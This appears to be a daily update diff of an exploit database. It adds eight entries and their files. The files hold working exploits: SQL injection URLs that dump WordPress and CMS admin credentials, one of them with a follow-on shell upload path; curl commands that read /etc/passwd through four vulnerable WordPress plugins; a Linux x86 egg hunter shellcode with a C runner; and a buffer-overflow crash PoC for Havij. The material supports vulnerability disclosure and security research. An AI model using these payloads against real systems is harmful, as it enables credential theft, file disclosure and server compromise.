DB: 2015-08-11

8 new exploits

files.csv

@@ -34034,6 +34034,8 @@ id,file,description,date,author,platform,type,port
 37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
+37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
+37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@@ -34062,7 +34064,13 @@ id,file,description,date,author,platform,type,port
 37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
+37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
+37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
 37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
 37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
+37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
+37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
+37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
+37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80

platforms/lin_x86/shellcode/37749.c

@@ -0,0 +1,63 @@
+/*
+Title: Linux x86 Egg Hunter Shellcode (19 bytes)
+Date: 4 August 2015
+Author: Guillaume Kaddouch
+    Website: http://networkfilter.blogspot.com
+    Twitter: @gkweb76
+Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
+
+This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).
+
+Egg signature = 0x50905090 (push eax, nop, push eax, nop)
+Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
+the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.
+
+egg-hunter.asm:
+----------------
+
+global _start
+
+section .text
+
+_start:
+        mov eax, addr                   ; retrieve a valid address (shorter than using JMP CALL POP)
+        mov ebx, dword 0x5090508f       ; egg signature altered: 0x50905090 - 1
+        inc ebx                         ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
+
+next_addr:
+        inc eax                         ; increasing memory address to look at next address
+        cmp dword [eax], ebx            ; check if our egg is at that memory address, if yes set ZF = 1
+        jne next_addr                   ; if ZF = 0 (check failed), then jump to next_addr to check next address
+        jmp eax                         ; we found our egg (ZF = 1), jump at this address
+
+        addr: db 0x1
+*/
+
+/*
+myegg.c:
+-----------
+Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+// Egg hunter 19 bytes (\x00 \x0a \x0d free)
+unsigned char egghunter[] = \
+"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
+"\xfb\xff\xe0\x01";
+
+// Print 'Egg Found!!' on screen
+// You can swap it out with any shellcode you like (as long as you keep the egg mark)
+unsigned char shellcode[] = \
+"\x90\x50\x90\x50" // egg mark
+"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
+"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
+"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
+
+main()
+{
+        printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
+        int (*ret)() = (int(*)())egghunter;
+        ret();
+}

platforms/php/webapps/37744.txt

@@ -0,0 +1,37 @@
+# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
+# Date: 20-01-2015
+# Software Link: https://wordpress.org/plugins/contus-video-gallery/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+
+1. Description
+  
+$_GET['vid'] is not escaped.
+
+google_adsense() is accessible for everyone.
+
+File: contus-video-gallery\hdflvvideoshare.php
+
+add_action('wp_ajax_googleadsense' ,'google_adsense');
+add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
+function google_adsense(){
+	global $wpdb;
+	$vid = $_GET['vid'];
+	$google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
+	$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
+	$google_adsense = unserialize($query);
+	echo $google_adsense['googleadsense_code'];
+	die();
+}
+
+http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html
+
+2. Proof of Concept
+
+http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
+  
+3. Solution:
+  
+Update to version 2.8

platforms/php/webapps/37750.txt

@@ -0,0 +1,21 @@
+# ( In The Name Of ALLAH )
+# Exploit Title : WDS CMS - SQL Injection
+# Google Dork : allinurl:wds_news/article.php?ID=
+# Date : 2015-08-09
+# Exploit Author : Ismail Marzouk
+# Vendor Homepage : http://webdesignskolan.se/
+# Tested on : Windows 7
+
+Exploit : http://
+[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
+
+Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
+
+Shell Path :  http://[Target]/wds_news/filer/shell.php
+
+
+# #### #### #### #### #### #### #### #### #
+# Facebook Profile : www.fb.com/ism.marzouk
+# #### #### #### #### #### #### #### #### #
+
+Good Luck ^__^

platforms/php/webapps/37751.txt

@@ -0,0 +1,24 @@
+Title: Remote file download vulnerability in wptf-image-gallery v1.03
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-17
+Download Site: https://wordpress.org/plugins/wptf-image-gallery
+Vendor: https://profiles.wordpress.org/sakush100/
+Vendor Notified: 0000-00-00
+Vendor Contact: plugins@wordpress.org
+Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
+Vulnerability:
+  The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files.  This allows an unauthenticated user to download sensitive system files: 
+
+
+  1 <?php
+  2 error_reporting(0);
+  3 $homepage = file_get_contents($_GET['url']);
+  4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
+  5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
+  6 echo $homepage;
+  7 ?>
+
+CVEID:
+OSVDB:
+Exploit Code:
+  • $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

platforms/php/webapps/37752.txt

@@ -0,0 +1,31 @@
+Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-13
+Download Site: https://wordpress.org/plugins/recent-backups
+Vendor: https://profiles.wordpress.org/andycheeseman/
+Vendor Notified: 0000-00-00
+Vendor Contact: plugins@wordpress.org
+Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
+Vulnerability:
+The code in  download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded.  This vulnerability can be used
+to download sensitive system files:
+
+     2  $file = $_GET['file_link'];
+     3  
+     4  if (file_exists($file)) {
+     5      header('Content-Description: File Transfer');
+     6      header('Content-Type: application/octet-stream');
+     7      header('Content-Disposition: attachment; filename='.basename($file));
+     8      header('Content-Transfer-Encoding: binary');
+     9      header('Expires: 0');
+    10      header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+    11      header('Pragma: public');
+    12      header('Content-Length: ' . filesize($file));
+    13      ob_clean();
+    14      flush();
+    15      readfile($file);
+
+CVEID:
+OSVDB:
+Exploit Code:
+  • $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

platforms/php/webapps/37753.txt

@@ -0,0 +1,43 @@
+Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-16
+Download Site: https://wordpress.org/plugins/simple-image-manipulator
+Vendor: https://profiles.wordpress.org/kevartpatel/
+Vendor Notified: 2015-07-16
+Vendor Contact: plugins@wordpress.org
+Description: Manipulate your wordpress images using slider and tickboxes.
+Vulnerability:
+In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
+
+
+ 14  /* Figure out the MIME type | Check in array */
+ 15  $known_mime_types=array(
+ 16         "pdf" => "application/pdf",
+ 17         "txt" => "text/plain",
+ 18         "html" => "text/html",
+ 19         "htm" => "text/html",
+ 20         "exe" => "application/octet-stream",
+ 21         "zip" => "application/zip",
+ 22         "doc" => "application/msword",
+ 23         "xls" => "application/vnd.ms-excel",
+ 24         "ppt" => "application/vnd.ms-powerpoint",
+ 25         "gif" => "image/gif",
+ 26         "png" => "image/png",
+ 27         "jpeg"=> "image/jpg",
+ 28         "jpg" =>  "image/jpg",
+ 29         "php" => "text/plain"
+ 30  );
+ 31 
+ 32  if($mime_type==''){
+ 33          $file_extension = strtolower(substr(strrchr($file,"."),1));
+ 34          if(array_key_exists($file_extension, $known_mime_types)){
+ 35                 $mime_type=$known_mime_types[$file_extension];
+ 36          } else {
+ 37                 $mime_type="application/force-download";
+ 38          };
+ 39  };
+
+CVEID:
+OSVDB:
+Exploit Code:
+  • curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"

platforms/php/webapps/37754.txt

@@ -0,0 +1,34 @@
+Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-12
+Download Site: https://wordpress.org/plugins/candidate-application-form
+Vendor: https://profiles.wordpress.org/flaxlandsconsulting/
+Vendor Notified: 2015-07-12
+Vendor Contact:
+Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
+Vulnerability:
+The code in downloadpdffile.php  doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:
+
+ <?php
+  2 $file_name = $_GET["fileName"];
+  3 $path = $_GET["fileUrl"];
+  4 $fullfile = $path.$file_name;
+  5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {
+  6     header('Pragma: public');   // required
+  7     header('Expires: 0');       // no cache
+  8     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+  9     header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_    name)).' GMT');
+ 10     header('Cache-Control: private',false);
+ 11     header('Content-Type: '.'application/pdf');
+ 12     header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_    name).'"');
+ 13     header('Content-Transfer-Encoding: binary');
+ 14     header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name));    // provide file     size
+ 15     header('Connection: close');
+ 16     readfile('../../uploads/candidate_application_form/'.$file_name);     // push it out
+ 17     exit();
+ 18 }
+
+CVEID:
+OSVDB:
+Exploit Code:
+  • $ curl http://server/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

platforms/windows/dos/37747.py

@@ -0,0 +1,17 @@
+#!/usr/bin/env python
+#Exploit Title:Havij Pro Crash POC
+# Tested:windows7
+#Sofrware Link:http://www.itsecteam.com/
+#Version:1.17
+#Email:i_7e1@outlook.com
+#Author:M1x7e1@Safeye Team
+#run python poc.py
+#copy content to target
+#click Analyze
+
+## EDB-Note: tested and verified using version 1.6 Pro
+
+content = “\x41” * 8000
+file = open(“xx.txt”,”w”)
+file.write(content)
+file.close()